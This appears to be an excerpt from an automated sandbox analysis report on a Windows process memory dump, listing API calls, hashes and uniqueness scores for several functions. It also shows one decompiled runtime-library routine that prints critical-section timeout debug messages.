                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070F1D2,0070F1D2,?,00000000,?,?), ref: 0071A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: a59380fd0bd120555cd7eed35a651cfb8d1aeaa441a93e7cb9f1c269fbb775f7
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: 97E01AB1200208ABDB10DF49CC85EE737ADEF88650F118154BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0070F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00708D14,?), ref: 0070F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 7e01860f83255627840df05937419826bcdb3004c6f52d4f931ec9e7b899fc48
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: E6D0A7757503087BE710FAA89C07F6632CC6B44B00F490074F948DB3C3DD54F4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0494967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                    • Instruction ID: 4159f8e0b77cd3c2e9be92d6a93eb7d9132a987a5b3297904f12f5d3e213580b
                    • Opcode Fuzzy Hash: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                    • Instruction Fuzzy Hash: B4B09BB19425C5C6F751D7708608B177954B7D0745F26C175D1020641A4778D0D1F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0499FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E0499FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0494CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04995720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04995720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x0499fdda
                    0x0499fde2
                    0x0499fde5
                    0x0499fdec
                    0x0499fdfa
                    0x0499fdff
                    0x0499fe0a
                    0x0499fe0f
                    0x0499fe17
                    0x0499fe1e
                    0x0499fe19
                    0x0499fe19
                    0x0499fe19
                    0x0499fe20
                    0x0499fe21
                    0x0499fe22
                    0x0499fe25
                    0x0499fe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0499FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0499FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0499FE01
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                    • Instruction ID: 44890b2951533b62b7e173179b2f513ec42b8732beee4e416d0d00f70c955994
                    • Opcode Fuzzy Hash: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                    • Instruction Fuzzy Hash: CAF0F632240201BFEA211A89DC06F23BB9AEB84734F150724F628965D1EA62FD60D7F4
                    Uniqueness

                    Uniqueness Score: -1.00%